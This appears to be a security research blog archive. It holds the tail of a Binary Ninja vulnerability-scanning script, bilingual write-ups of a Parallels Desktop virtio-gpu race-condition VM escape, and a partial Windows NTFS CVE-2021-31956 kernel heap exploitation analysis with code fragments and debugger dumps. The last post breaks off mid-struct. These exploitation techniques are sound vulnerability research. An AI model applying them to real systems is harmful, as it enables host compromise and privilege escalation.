        if is_constant(cmd):
            continue
        ret.append((symbol,func.name,ref.address,Error.COMMANDINJECT))
    return ret

def get_function_addr(bv,symbol):
    syms = []
    if symbol in bv.symbols:
        syms = bv.symbols[symbol]
    if "_%s"%symbol in bv.symbols:
        syms = bv.symbols["_%s"%symbol]
    for i in syms:
        if "mips32" == bv.arch.name or "mipsel32" == bv.arch.name:
            if i.type == SymbolType.ImportAddressSymbol:
                return i.address
        else:
            if i.type == SymbolType.ImportedFunctionSymbol:
                return i.address
    return None

def is_constant(a):
    return a.type == RegisterValueType.ConstantPointerValue or a.type == RegisterValueType.ConstantValue

if __name__ == "__main__":
    input_file = sys.argv[1]
    if os.path.exists(input_file + ".bndb"):
        bv = open_view(input_file + ".bndb")
    else:
        bv = open_view(input_file)
        settings = SaveSettings()
        bv.create_database(input_file + ".bndb", None, settings)
    ret = check_system(bv)
    for i in ret:
        print("%-15s function: %-20s addr: 0x%x %s"%(i[0],i[1],i[2],i[3]))

上面的代码的主要逻辑在check_system函数，我这里只是把调用system时参数不为常量的调用过滤掉，最后将所有的结果输出出来。这样就能大大减少我需要检查的system调用数量。同样，我还可以通过Binary Ninja的API检查sprintf的调用是否存在buffer越界的风险。

def check_sprintf(bv,symbol = "sprintf"):
    addr = get_function_addr(bv,symbol)
    if addr == None:
        return []
    refs = bv.get_code_refs(addr)
    ret = []
    for ref in refs:
        func = ref.function
        fmt = func.get_parameter_at(ref.address,None,1)
        if not is_constant(fmt):
            ret.append((symbol,func.name,ref.address,Error.FORMAT_UNCONSTANT))
            continue
        asc = bv.get_ascii_string_at(fmt.value,min_length = 2)
        if asc == None:
            continue
        fmt_value = asc.value
        cidx = 0
        arg_idx = 1
        while True:
            idx = fmt_value.find("%",cidx)
            if idx < 0:
                break
            arg_idx += 1
            cidx = idx + 1
            if fmt_value[idx:].startswith("%s"):
                arg = func.get_parameter_at(ref.address,None,arg_idx)
                if not is_constant(arg):
                    ret.append((symbol,func.name,ref.address,Error.FORMAT_OVERFLOW))
    return ret

上述这些漏洞分析的误报率仍然会比较高，根据经验，我往往会额外地添加一些看起来不是特别正确的约束条件：

strcpy strcat
要求dst参数为栈空间（更有可能出现stackoverflow）
system
要求调用system的同时调用snprintf或sprintf（更有可能发生命令注入）
sscanf
要求调用sscanf的同时没有调用fopen（开发者会使用sscanf来读取配置文件里的信息）

通过上述的约束，自动化分析输出的结果已经大体上可以被作为静态分析的参考来使用了，不过想要进行批量化的固件分析，还需要再进一步地优化。目前我正在研究如何通过使用Binary Ninja的中间语言进行比较完整的数据流分析，进一步降低误报率，如果有其他的更新我会在这里进行同步，也欢迎有兴趣的同学来和我联系。

参考资料

Escape from Parallels Desktop

2022-02-13T09:32:23.000Z

Parallels Desktop is a virtual machine software under the macOS system that helps users run Windows, Linux and other operating systems. In September 2021, I started security research on Parallels Desktop, during which I discovered several high-severity vulnerabilities. Unfortunately, in the latest update, my vulnerabilities were patched. I wrote this article to describe my Parallels Desktop research process, as well as the technical details of finding and exploiting vulnerabilities.

中文版

Introduction

The version of Parallels Desktop I studied is 17.0.1 (51482), and I clarified some basic logic of this software by slowly groping. The name of the program responsible for running the virtual machine is prl_vm_app. Similar to other virtualization software, the structure is shown below.

prl_vm_app needs to handle interrupt requests from vCPU, simulate peripheral operations, and call it Host. What we usually call virtual machine escape is to destroy the host application by sending illegal requests on the guest host, and implement code execution on the host.

On a traditional physical machine, the CPU generally communicates with devices through io ports and memory mapping (DMA), and this is the part that software must simulate. At the same time, prl_vm_app also implements some custom communication protocols in order to realize some common functions of virtual machines such as clipboard sharing and file sharing. This protocol generally transmits data through agreed registers and physical memory, and needs to be used in conjunction with the driver developed by Parallels itself. Research by others in the past has found some security issues in protocol processing, and this is a good and easiest attack surface to locate.

Another attack surface is the simulation code of various devices on the Host. The interaction protocol of each device is different. When auditing the code, I need to learn one by one. This is a very time-consuming task. Almost half of the mining process is learning how to properly interact with these devices, and the other half is reverse auditing the corresponding code. The content of my audit is also very simple, mainly whether the index is properly checked, whether there is an integer overflow, whether the memory copy is out of bounds, etc. But these type of bug are easy to find, and previous research work and the security measures of developers will definitely make similar bugs less and less. After fumbling around for a while and getting nowhere in my vulnerability digging, I started looking for experience from other people’s security research.

In the past virtualization research, I noticed a relatively easy vulnerability mode TOCTOU (Time of Check Time of Use). Similar problems have occurred in Vmware products, such as CVE-2020-3981, CVE-2020-3982, QEMU has also been exposed to this problem such as CVE-2018-16872. This is a very easy error during development. In the final analysis, it is caused by Race. The Guest and the Host share physical memory through memory mapping. When the Host checks the requested data, the Guest can modify the data at the same time. Next I will explain it in detail with specific bugs.

Vulnerability Analysis

I found a similar problem in the virtio-gpu device, as shown below, the input pointer is the memory map of the Guest physical memory in the Host, and when processing the VIRTIO_GPU_CMD_UPDATE_CURSOR request, two variables input are read from the Guest’s input ->pos.scanout_id and input->resource_id, check scanout_id on line 8 to see if the array index is out of bounds, and write resource_id into the array on line 16.

...
input = (virtio_gpu_update_cursor *)v5->hva;
if ( !v5->hva )
  goto LABEL_60;
if ( !v87 )
  goto LABEL_60;
v10 = input->pos.scanout_id;
if ( v10 >= 0x10 )                        // Time of check
  goto LABEL_60;
v11 = v10;
new_x = a1->scanouts[v11].rect.x + input->pos.x;
new_y = a1->scanouts[v11].rect.y + input->pos.y;
if ( input->hdr.type != VIRTIO_GPU_CMD_UPDATE_CURSOR )
  goto LABEL_55;
QMutex::lock(v62);
a1->resource_ids[input->pos.scanout_id] = input->resource_id;// Time of Use
      ...

We can create a new thread through the code execution gap from lines 8 to 16, and modify scanout_id to any data, that is, we can write any value out of bounds in the array.

If this scanout_id is modified to an illegal value, it may cause illegal memory access. This is the crash log at that time.

Vulnerability Exploit

At present, we have written arbitrary data with relative offset. Next, I will discuss the construction of information leakage and arbitrary address reading and writing by tampering with the structure a1(gpu_buffer)

struct {
    void* vtable;
    ...
    uint32_t resource_ids [0x10];
    ...
    struct {
        ...
        queue_result* queue_result;
    } cursor_queue;
    struct {
        ...
        queue_result* queue_result;
    } control_queue;
    ...
} gpu_buffer;

Address Information Leakage

Through debugging, I found that the address space of prl_vm_app is as follows. After the address randomization is turned on, the Image Base starts from a random address of 0x1xxxxx000, followed by the Guest Memory. If the physical memory of the virtual machine is large enough, such as more than 4G, then there is a high probability that some fixed Host virtual addresses (such as 0x200000000) will definitely fall on the Guest Memory.

In the process of GPU processing, queue_result saves the interactive address mapping information. As shown below, the GPU takes the corresponding memory address and data length from the virtio queue, translates it into a virtual address on the Host through gpa_to_hva, and writes it back to mem_handlers.

v2 = a1->cursor_queue.queue_result;
...
while ( 1 )
    {
        v5 = v2->mem_handlers;
        gpa_to_hva(
        v2->mem_handlers,
        a1->cursor_queue.chunk.desc_array[0].addr,
        a1->cursor_queue.chunk.desc_array[0].length);
...

struct {
    uint64_t hva;
    uint64_t gpa;
    uint32_t length;
} mem_handler;

When exploiting, I modified the queue_result pointer to a fixed constant of 0x180000000, and then triggered any virtio-gpu request, and Host wrote the address translation information to queue_result (the pointer has been tampered with 0x180000000). Then I searched the physical memory of the entire virtual machine for the modified physical page, so as to infer that the Guest Memory Base on host.

uint64_t fake_hva = 0x180000000;
uint32_t search_ptr = 0x01000000;
uint32_t search_end = 0xb0000000;
uint64_t guest_base = 0;
while(search_ptr < search_end){
    if(*(uint32_t*)search_ptr == 0xfffffffe){
        kprintf("find target addr at: 0x%x\n",search_ptr);
        guest_base = fake_hva - (uint64_t)search_ptr;
        break;
    }
    search_ptr += 0x1000;
}
if(search_ptr == search_end){
    kprintf("can't find target addr\n");
    return;
}
kprintf("VM base addr: 0x%lx",guest_base);

Arbitrary Address Read

The queue_result is tampered to point to the guest physical memory, which can not only achieve information leakage, but also facilitate subsequent use. Because it saves the address information during interaction, by tampering with the data in it, any address can be read and written.

I used the following gadget, which is a code branch when the GPU handles different requests. The code content from lines 8 to 17 is to write the v19->mem_handlers[0].hva data of the virtual machine back to v19 ->mem_handlers[2].hva. Normally, they hold the addresses translated by gpa_to_hva which tell the device where to read data from and where to write data. Guest and virtio-gpu agree that data is read from v19->mem_handlers[0].hva, and the returned result is written back to v19->mem_handlers[2].hva.

else if ( dword_10101ED68 > 0 )
  {
    debug("", "LocalDevices", 1u, "[%s] Incorect command size", "SUBMIT_3D");
  }
  goto LABEL_5;
default:
  v19 = v1->control_queue.queue_result;
  gpa_to_hva(&v19->mem_handlers[2], v19->output_gpa, v19->output_length);
  v20 = (_QWORD *)v19->mem_handlers[2].hva;
  a4 = v19->output_length;
  if ( a4 >= 0x19uLL )
    __bzero(v20, a4);
  v21 = (_QWORD *)v19->mem_handlers[0].hva;
  v22 = v21[1];
  *v20 = *v21;
  v20[2] = v21[2];
  v20[1] = v22;
  *(_DWORD *)v20 = 0x1200;
  goto LABEL_5;

When the request is called, a new thread is enabled again, and v19->mem_handlers[0].hva is modified to any address, that is, any address can be read, and the data can be written back to v19->mem_handlers[2].hva.

Arbitrary Address Write

The method of writing any address is similar to the above. After the address translation of v19->mem_handlers[2] is completed in line 8, I can quickly change v19->mem_handlers[2].hva to arbitrary address that needs to be written through Race. It’s just that compared to reading at any address, the race window is very small. Only after the gpa_to_hva function on line 8 exits and before the assignment of v20 on line 9, modify v19->mem_handlers[2].hva to successfully implement arbitrary address writing. However, this method can be called an infinite number of times, and a few attempts will always succeed.

With arbitrary address read and write, firstly search the Image Base near the Guest Memory Base, find the link library, calculate the system address in libc, and finally implement arbitrary code execution by tampering with the function pointer.

References

Parallels Desktop虚拟机逃逸

2022-02-13T08:57:33.000Z

Parallels Desktop是在macOS系统下的一款虚拟机软件，帮助用户在macOS上运行Windows、Linux等操作系统。在2021年9月份我开始了Parallels Desktop的安全研究，期间发现了若干高危漏洞，非常不幸地是在最近一次更新中，我的漏洞被修补掉了。我写这篇文章用于介绍我的Parallels Desktop研究过程，以及发现漏洞、利用漏洞的技术细节。

English version

软件介绍

我研究的Parallels Desktop版本是17.0.1（51482），通过慢慢摸索理清了这个软件的一些基本逻辑，其负责运行虚拟机的程序名字为prl_vm_app，和其他的虚拟化软件类似，它的主要结构如下所示。

prl_vm_app通过syscall的方式向Apple Hypervisor Framework申请vCPU，给vCPU绑定内存映射，就可以运行了，不过这只是一个简单的虚拟机模型，在这里称之为Guest。prl_vm_app需要处理来自vCPU的中断请求，模拟外设操作，称之为Host。我们通常所说的虚拟机逃逸就是在Guest主机上通过发送非法请求破坏Host应用程序，在宿主机上实现代码执行。

在传统的物理机上，CPU一般通过io port、内存映射（DMA）的方法和外设进行通信，这是软件必须模拟的部分。同时prl_vm_app为了实现一些虚拟机常见的功能如剪贴板共享、文件共享，还实现了一些自定义的通信协议，这种协议一般通过约定好的寄存器、物理内存进行数据传输，需要配合Parallels自己开发的系统驱动使用。过去其他安全研究人员在协议处理时发现了一些安全问题，这是一个很不错也是最容易定位的攻击面。

另外一个攻击面是Host上各种外设的模拟代码，每一种外设的交互协议各不相同，在审计代码时需要逐个学习，这是一个非常耗时的工作，我在漏洞挖掘的过程中几乎有一半的时间是在学习如何正确地和这些外设交互，另外一半的时间在逆向审计对应的代码。我的审计内容也很简单，主要是审计index有没有被正确地检查，是否存在整数溢出，内存拷贝的时候是否造成越界等这些情况。但是这种类型的错误很容易会被发现，前人的研究工作以及开发人员的安全措施肯定会让类似的BUG越来越少。经过一段时间的摸索，我的漏洞挖掘工作毫无进展，我开始从其他人的安全研究中寻找经验。

在过去的虚拟化研究中，我注意到一个比较容易出现的漏洞模式TOCTOU（Time of Check Time of Use），Vmware产品中出现过类似的问题，如CVE-2020-3981、 CVE-2020-3982，QEMU也被曝出过该问题如CVE-2018-16872。这是一种开发时非常容易出现的错误，归根结底是因为Race造成的，Guest和Host通过内存映射的方法共享物理内存，Host在对请求的数据进行检查时，Guest可以同时对数据进行修改。接下来我会通过具体bug对它进行详细解释。

漏洞分析

我在virtio-gpu外设中发现了类似的问题，如下所示，input指针是Guest物理内存在Host进程中的内存映射，在处理VIRTIO_GPU_CMD_UPDATE_CURSOR请求时，从Guest的input中读取了两个变量input->pos.scanout_id和input->resource_id，在第8行对scanout_id进行检查数组索引是否越界，在第16行将resource_id写入数组。

...
input = (virtio_gpu_update_cursor *)v5->hva;
if ( !v5->hva )
  goto LABEL_60;
if ( !v87 )
  goto LABEL_60;
v10 = input->pos.scanout_id;
if ( v10 >= 0x10 )                        // Time of check
  goto LABEL_60;
v11 = v10;
new_x = a1->scanouts[v11].rect.x + input->pos.x;
new_y = a1->scanouts[v11].rect.y + input->pos.y;
if ( input->hdr.type != VIRTIO_GPU_CMD_UPDATE_CURSOR )
  goto LABEL_55;
QMutex::lock(v62);
a1->resource_ids[input->pos.scanout_id] = input->resource_id;// Time of Use
      ...

我们可以通过第8行到第16行的代码执行间隙新起一个线程，将scanout_id修改为任意数据，即可以实现在数组越界写任意值。

如果这时scanout_id被修改为非法值，有可能造成非法访存，这是当时的崩溃日志。

漏洞利用

目前我们已经有了相对偏移的任意数据写，接下来讲述通过篡改a1的结构体（gpu_buffer）数据，构造信息泄露以及任意地址读写。

struct {
    void* vtable;
    ...
    uint32_t resource_ids [0x10];
    ...
    struct {
        ...
        queue_result* queue_result;
    } cursor_queue;
    struct {
        ...
        queue_result* queue_result;
    } control_queue;
    ...
} gpu_buffer;

地址信息泄露

通过调试发现，prl_vm_app的地址空间如下所示。开启了地址随机化以后，Image Base从0x1xxxxx000的一个随机地址开始，紧接着就是Guest Memory。如果虚拟机的物理内存足够大，比如超过4G，那么很大概率上一些固定的Host虚拟地址（如0x200000000）肯定会落在Guest Memory上。

在GPU处理的过程中，queue_result保存交互的地址映射信息。如下所示，GPU从virtio queue取出对应的内存地址和数据长度，通过gpa_to_hva将其翻译为Host上的虚拟地址，写回到mem_handlers。

v2 = a1->cursor_queue.queue_result;
...
while ( 1 )
    {
        v5 = v2->mem_handlers;
        gpa_to_hva(
        v2->mem_handlers,
        a1->cursor_queue.chunk.desc_array[0].addr,
        a1->cursor_queue.chunk.desc_array[0].length);
...

struct {
    uint64_t hva;
    uint64_t gpa;
    uint32_t length;
} mem_handler;

在利用时，我将queue_result指针修改为一固定的常量0x180000000，然后触发virtio-gpu任意请求，Host将地址翻译信息写入到queue_result（已经将指针篡改为0x180000000）。接着我在整个虚拟机的物理内存里搜索被修改的物理页，从而推断出Guest Memory在对应宿主机的虚拟地址。

uint64_t fake_hva = 0x180000000;
uint32_t search_ptr = 0x01000000;
uint32_t search_end = 0xb0000000;
uint64_t guest_base = 0;
while(search_ptr < search_end){
    if(*(uint32_t*)search_ptr == 0xfffffffe){
        kprintf("find target addr at: 0x%x\n",search_ptr);
        guest_base = fake_hva - (uint64_t)search_ptr;
        break;
    }
    search_ptr += 0x1000;
}
if(search_ptr == search_end){
    kprintf("can't find target addr\n");
    return;
}
kprintf("VM base addr: 0x%lx",guest_base);

任意地址读

将queue_result篡改指向到了Guest物理内存，不仅可以实现信息泄露，而且方便后面的利用。因为它保存着交互时的地址信息，通过篡改里面的数据，可以实现任意地址读写。

我利用到了下面的一段gadget，这是GPU处理不同请求时的一个代码分支，在第8行到第17行的代码内容是将虚拟机的v19->mem_handlers[0].hva数据写回到v19->mem_handlers[2].hva中。正常情况下它们保存着经过gpa_to_hva翻译的地址，用来指示GPU从哪里读数据，往哪里写数据。Guest和virtio-gpu约定数据从v19->mem_handlers[0].hva读入，返回结果写回到v19->mem_handlers[2].hva。

else if ( dword_10101ED68 > 0 )
  {
    debug("", "LocalDevices", 1u, "[%s] Incorect command size", "SUBMIT_3D");
  }
  goto LABEL_5;
default:
  v19 = v1->control_queue.queue_result;
  gpa_to_hva(&v19->mem_handlers[2], v19->output_gpa, v19->output_length);
  v20 = (_QWORD *)v19->mem_handlers[2].hva;
  a4 = v19->output_length;
  if ( a4 >= 0x19uLL )
    __bzero(v20, a4);
  v21 = (_QWORD *)v19->mem_handlers[0].hva;
  v22 = v21[1];
  *v20 = *v21;
  v20[2] = v21[2];
  v20[1] = v22;
  *(_DWORD *)v20 = 0x1200;
  goto LABEL_5;

在调用该请求时再次启用新的线程，修改v19->mem_handlers[0].hva为任意地址，即可以实现任意地址读，将数据写回到v19->mem_handlers[2].hva

任意地址写

任意地址写的方法和上述类似，在第8行完成v19->mem_handlers[2]的地址翻译以后，通过Race将v19->mem_handlers[2].hva迅速改为任意需要写的地址。只不过相比于任意地址读，这个方法的race窗口非常小，只能在第8行gpa_to_hva函数退出后，第9行v20赋值前，修改掉v19->mem_handlers[2].hva才能成功实现任意地址写。不过这种方法可以无限次调用，尝试几次总会成功的。

有了任意地址读写以后，首先通过Guest Memory Base在内存临近出搜索Image Base，找到链接库，计算libc里的system地址，最终通过篡改函数指针实现任意代码执行。

参考资料

CVE-2021-31956漏洞分析

2021-12-23T10:19:24.000Z

概述

CVE-2021-31956是微软2021年6月份披露的一个内核堆溢出漏洞，攻击者可以利用此漏洞实现本地权限提升，nccgroup的博客已经进行了详细的利用分析，不过并没有贴出exploit的源代码。

本篇文章记录一下自己学习windows exploit的过程，使用的利用技巧和nccgroup提到的大同小异，仅供学习参考。

漏洞定位

漏洞定位在windows的NTFS文件系统驱动上(C:\Windows\System32\drivers\ntfs.sys)，NTFS文件系统允许为每一个文件额外存储若干个键值对属性，称之为EA(Extend Attribution) 。从微软的开发文档上可以查出，有一些系统调用是用来处理键值对的读写操作。

// 为文件创建EA
NTSTATUS ZwSetEaFile(
  [in]  HANDLE           FileHandle,
  [out] PIO_STATUS_BLOCK IoStatusBlock,
  [in]  PVOID            Buffer,
  [in]  ULONG            Length
);
// 查询文件EA
NTSTATUS ZwQueryEaFile(
  [in]           HANDLE           FileHandle,
  [out]          PIO_STATUS_BLOCK IoStatusBlock,
  [out]          PVOID            Buffer, // PFILE_FULL_EA_INFORMATION
  [in]           ULONG            Length,
  [in]           BOOLEAN          ReturnSingleEntry,
  [in, optional] PVOID            EaList, // PFILE_GET_EA_INFORMATION
  [in]           ULONG            EaListLength,
  [in, optional] PULONG           EaIndex,
  [in]           BOOLEAN          RestartScan
);

typedef struct _FILE_GET_EA_INFORMATION {
  ULONG NextEntryOffset;
  UCHAR EaNameLength;
  CHAR  EaName[1];
} FILE_GET_EA_INFORMATION, *PFILE_GET_EA_INFORMATION;

typedef struct _FILE_FULL_EA_INFORMATION {
  ULONG  NextEntryOffset;
  UCHAR  Flags;
  UCHAR  EaNameLength;
  USHORT EaValueLength;
  CHAR   EaName[1];
} FILE_FULL_EA_INFORMATION, *PFILE_FULL_EA_INFORMATION;

如下是查询EA的系统调用实现，查询时接收一个用户传入的字典的key集合eaList，将查询到的键值对写入到output_buffer。每次写完一个键值对，需要四字节对齐，函数内部维护了一个变量padding_length用来指示每次向output_buffer写入时需要额外填充的数据长度，同时维护了一个变量为output_buffer_length用来记录output_buffer剩余的可用空间。但是在【A】处写入键值对时并没有检查output_buffer_length是否大于padding_length，两个uint32相减以后发生整数溢出绕过检查，在后面memmove的时候实现任意长度，任意内容越界写。

_QWORD *__fastcall NtfsQueryEaUserEaList(_QWORD *a1, FILE_FULL_EA_INFORMATION *ea_blocks_for_file, __int64 a3, __int64 output_buffer, unsigned int output_buffer_length, PFILE_GET_EA_INFORMATION eaList, char a7)
{
  int v8; // edi
  ULONG eaList_iter; // ebx
  unsigned int padding_length; // er15
  PFILE_GET_EA_INFORMATION current_ea; // r12
  ULONG v12; // er14
  UCHAR v13; // r13
  PFILE_GET_EA_INFORMATION i; // rbx
  unsigned int output_idx_; // ebx
  FILE_FULL_EA_INFORMATION *output_iter; // r13
  unsigned int current_ea_output_length; // er14
  unsigned int v18; // ebx
  FILE_FULL_EA_INFORMATION *v20; // rdx
  char v21; // al
  ULONG next_iter; // [rsp+20h] [rbp-38h]
  unsigned int v23; // [rsp+24h] [rbp-34h] BYREF
  FILE_FULL_EA_INFORMATION *v24; // [rsp+28h] [rbp-30h]
  struct _STRING reqEaName; // [rsp+30h] [rbp-28h] BYREF
  STRING SourceString; // [rsp+40h] [rbp-18h] BYREF
  unsigned int output_idx; // [rsp+A0h] [rbp+48h]

  v8 = 0;
  *a1 = 0i64;
  v24 = 0i64;
  eaList_iter = 0;
  output_idx = 0;
  padding_length = 0;
  a1[1] = 0i64;
  while ( 1 )
  {
    current_ea = (PFILE_GET_EA_INFORMATION)((char *)eaList + eaList_iter);
    *(_QWORD *)&reqEaName.Length = 0i64;
    reqEaName.Buffer = 0i64;
    *(_QWORD *)&SourceString.Length = 0i64;
    SourceString.Buffer = 0i64;
    *(_QWORD *)&reqEaName.Length = current_ea->EaNameLength;
    reqEaName.MaximumLength = reqEaName.Length;
    reqEaName.Buffer = current_ea->EaName;
    RtlUpperString(&reqEaName, &reqEaName);
    if ( !NtfsIsEaNameValid(&reqEaName) )
      break;
    v12 = current_ea->NextEntryOffset;
    v13 = current_ea->EaNameLength;
    next_iter = current_ea->NextEntryOffset + eaList_iter;
    for ( i = eaList; ; i = (PFILE_GET_EA_INFORMATION)((char *)i + i->NextEntryOffset) )
    {
      if ( i == current_ea )
      {
        output_idx_ = output_idx;
        output_iter = (FILE_FULL_EA_INFORMATION *)(output_buffer + padding_length + output_idx);
        if ( NtfsLocateEaByName((__int64)ea_blocks_for_file, *(_DWORD *)(a3 + 4), &reqEaName, &v23) )
        {                                       // Find EA
          v20 = (FILE_FULL_EA_INFORMATION *)((char *)ea_blocks_for_file + v23);
          current_ea_output_length = v20->EaValueLength + v20->EaNameLength + 9;
          if ( current_ea_output_length <= output_buffer_length - padding_length )                   // 【A】
          {
            memmove(output_iter, v20, current_ea_output_length);
            output_iter->NextEntryOffset = 0;
            goto LABEL_8;
          }
        }
        else
        {                                       // EA not found??
          current_ea_output_length = current_ea->EaNameLength + 9;
          if ( current_ea_output_length + padding_length <= output_buffer_length )
          {
            output_iter->NextEntryOffset = 0;
            output_iter->Flags = 0;
            output_iter->EaNameLength = current_ea->EaNameLength;
            output_iter->EaValueLength = 0;
            memmove(output_iter->EaName, current_ea->EaName, current_ea->EaNameLength);
            SourceString.Length = reqEaName.Length;
            SourceString.MaximumLength = reqEaName.Length;
            SourceString.Buffer = output_iter->EaName;
            RtlUpperString(&SourceString, &SourceString);
            output_idx_ = output_idx;
            output_iter->EaName[current_ea->EaNameLength] = 0;
LABEL_8:
            v18 = current_ea_output_length + padding_length + output_idx_;
            output_idx = v18;
            if ( !a7 )
            {
              if ( v24 )
                v24->NextEntryOffset = (_DWORD)output_iter - (_DWORD)v24;
              if ( current_ea->NextEntryOffset )
              {
                v24 = output_iter;
                output_buffer_length -= current_ea_output_length + padding_length;
                padding_length = ((current_ea_output_length + 3) & 0xFFFFFFFC) - current_ea_output_length;
                goto LABEL_26;
              }
            }
...

漏洞分析

在具体介绍利用之前，需要先简单了解一下windows的堆分配算法。Windows10引入了新的方式进行堆块管理，称为Segment Heap，这里有篇文章对此进行了详细的描述https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pool_overflow_exploitation_since_windows_10_19h1/SSTIC2020-Article-pool_overflow_exploitation_since_windows_10_19h1-bayet_fariello.pdf。

每个堆块有个堆头用来记录元信息，占据了16个字节，结构如下。

typedef struct {
char previousSize;
char poolIndex;
char blockSize;
char poolType;
int tag;
void* processBilled;
}PoolHeader;

相对偏移地址读写

这个漏洞里，越界对象output_buffer是系统临时申请的堆块，系统调用结束以后会被立即释放，不能持久化保存，这导致SegmentHeap Aligned Chunk Confusion的方法在这里并不适用。通过实验发现windows在free时的检查并不严格，通过合理控制越界内容，破坏掉下一个堆块的PoolHeader以后，并不会触发异常，这允许我们直接覆盖下一个堆块的数据，接下来的目标就是挑选合适的被攻击堆块对象。

通过查阅资料，我找到了一个用户可以自定义大小的结构体_WNF_STATE_DATA。关于WNF的实际用法，微软并没有提供官方的说明文档，这里不展开介绍，只用把它理解成一个内核实现的数据存储器即可。通过NtCreateWnfStateName创建一个WNF对象实例，实例的数据结构为_WNF_NAME_INSTANCE；通过NtUpdateWnfStateData可以往对象里写入数据，使用_WNF_STATE_DATA数据结构存储写入的内容；通过NtQueryWnfStateData可以读取之前写入的数据，通过NtDeleteWnfStateData可以释放掉这个对象。

//0xa8 bytes (sizeof)
struct _WNF_NAME_INSTANCE
{
    struct _WNF_NODE_HEADER Header;                                         //0x0
    struct _EX_RUNDOWN_REF RunRef;                                          //0x8
    struct _RTL_BALANCED_NODE TreeLinks;                                    //0x10
    struct _WNF_STATE_NAME_STRUCT StateName;                                //0x28
    struct _WNF_SCOPE_INSTANCE* ScopeInstance;                              //0x30
    struct _WNF_STATE_NAME_REGISTRATION StateNameInfo;                      //0x38
    struct _WNF_LOCK StateDataLock;                                         //0x50
    struct _WNF_STATE_DATA* StateData;                                      //0x58
    ULONG CurrentChangeStamp;                                               //0x60
    VOID* PermanentDataStore;                                               //0x68
    struct _WNF_LOCK StateSubscriptionListLock;                             //0x70
    struct _LIST_ENTRY StateSubscriptionListHead;                           //0x78
    struct _LIST_ENTRY TemporaryNameListEntry;                              //0x88
    struct _EPROCESS* CreatorProcess;                                       //0x98
    LONG DataSubscribersCount;                                              //0xa0
    LONG CurrentDeliveryCount;                                              //0xa4
};
struct _WNF_STATE_DATA
{
    struct _WNF_NODE_HEADER Header;                                         //0x0
    ULONG AllocatedSize;                                                    //0x4
    ULONG DataSize;                                                         //0x8
    ULONG ChangeStamp;                                                      //0xc
};

举例说明，WNF数据在内核里的保存方式如下所示

1: kd> dd ffffdd841d4b6850
ffffdd84`1d4b6850  0b0c0000 20666e57 25a80214 73ca76c5      // PoolHeader 0x10个字节
ffffdd84`1d4b6860  00100904 000000a0 000000a0 00000001      // _WNF_STATE_DATA 数据结构，用户数据的长度为0xa0 0x10个字节
ffffdd84`1d4b6870  61616161 61616161 61616161 61616161      // WNF数据
ffffdd84`1d4b6880  61616161 61616161 61616161 61616161
ffffdd84`1d4b6890  61616161 61616161 61616161 61616161
ffffdd84`1d4b68a0  61616161 61616161 61616161 61616161
ffffdd84`1d4b68b0  61616161 61616161 61616161 61616161
ffffdd84`1d4b68c0  61616161 61616161 61616161 61616161

通过喷堆，控制堆布局如下，NtFE是可以越界写的 chunk，后面紧挨着的是_WNF_STATE_DATA数据结构。越界修改结构体里的DataSize对象，接下来调用NtQueryWnfStateData实现相对偏移地址读写。

0: kd> g
Breakpoint 1 hit
Ntfs!NtfsQueryEaUserEaList:
fffff802`3d2a8990 4c894c2420      mov     qword ptr [rsp+20h],r9
1: kd> !pool r9
Pool page ffffdd841d4b67a0 region is Paged pool
 ffffdd841d4b6010 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff878ff44c80c0
 ffffdd841d4b60d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff878ff44c80c0
 ffffdd841d4b6190 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff878ff44c80c0
 ffffdd841d4b6250 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff878ff44c80c0
 ffffdd841d4b6310 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff878ff44c80c0
 ffffdd841d4b63d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff878ff44c80c0
 ffffdd841d4b6490 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff878ff44c80c0
 ffffdd841d4b6550 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff878ff44c80c0
 ffffdd841d4b6610 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff878ff44c80c0
 ffffdd841d4b66d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff878ff44c80c0
*ffffdd841d4b6790 size:   c0 previous size:    0  (Allocated) *NtFE
Pooltag NtFE : Ea.c, Binary : ntfs.sys
 ffffdd841d4b6850 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff878ff44c80c0
 ffffdd841d4b6910 size:   c0 previous size:    0  (Free)       ....
 ffffdd841d4b69d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff878ff44c80c0
 ffffdd841d4b6a90 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff878ff44c80c0
 ffffdd841d4b6b50 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff878ff44c80c0
 ffffdd841d4b6c10 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff878ff44c80c0
 ffffdd841d4b6cd0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff878ff44c80c0
 ffffdd841d4b6d90 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff878ff44c80c0
 ffffdd841d4b6e50 size:   c0 previous size:    0  (Free)       ....
 ffffdd841d4b6f10 size:   c0 previous size:    0  (Free)       ....

被篡改过后的_WNF_STATE_DATA 数据结构

1: kd> dd ffffdd841d4b6850
ffffdd84`1d4b6850  030c0000 41414141 00000000 00000000  // 伪造的PoolHeader
ffffdd84`1d4b6860  00000000 0000ffff 000003cc 00000000  // 伪造的_WNF_STATE_DATA，将用户数据长度改为了0x3cc
ffffdd84`1d4b6870  61616161 61616161 61616161 61616161
ffffdd84`1d4b6880  61616161 61616161 61616161 61616161
ffffdd84`1d4b6890  61616161 61616161 61616161 61616161
ffffdd84`1d4b68a0  61616161 61616161 61616161 61616161
ffffdd84`1d4b68b0  61616161 61616161 61616161 61616161
ffffdd84`1d4b68c0  61616161 61616161 61616161 61616161

接下来讲述如何将相对偏移读写转换为任意地址读写。

任意地址读

我们需要使用到另外一个数据结构PipeAttribution，和WNF类似，这个对象可以自定义大小。这里两个指针AttributeName、AttributeValue 正常情况下是指向PipeAttribute.data[]后面的，如果通过堆布局，将AttributeValue的指针该为任意地址，就可以实现任意地址读。遗憾的是，windows并没有提供直接更新该数据结构的功能，不能通过该方法进行任意地址写。

struct PipeAttribute {
LIST_ENTRY list;
char * AttributeName;
uint64_t AttributeValueSize ;
char * AttributeValue ;
